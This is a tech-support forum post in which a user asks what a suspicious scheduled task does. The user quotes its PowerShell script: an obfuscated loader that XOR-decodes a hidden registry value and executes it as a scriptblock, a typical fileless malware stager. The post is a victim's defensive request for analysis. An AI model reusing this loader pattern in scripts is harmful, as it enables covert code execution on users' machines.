Jump to content

Help to identify suspicious task "jojLNs"

Guest ErichBrutus

By Guest ErichBrutus
in Tech Support & Discussions Forum

 Share

Recommended Posts

Guest ErichBrutus

Guest ErichBrutus

Posted
Posted

I had a somewhat suspicious task scheduled called "jojLNs" for some reason, it was tasked to run a powershell script in System32, the contents of which look something like this: $BeGAuVtuCJ=[scriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm ($BeGAuVtuCJ::Create($nXopPKHXZuvg::Join('', ((gp 'HKLM:\SOFTWARE\DefaultUserEnvironment03ZVQpAT').'6YoArxq' | % { ($_ -bxor (27+16+8+74+21+21+3+0+0+2+3+1)) -as $RFmkrqWtsy }))))Can anyone please tell what it was doing and was it harmful in any way?

 

Continue reading...

  • Replies 0
  • Created
  • Last Reply

Popular Days

Popular Days

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...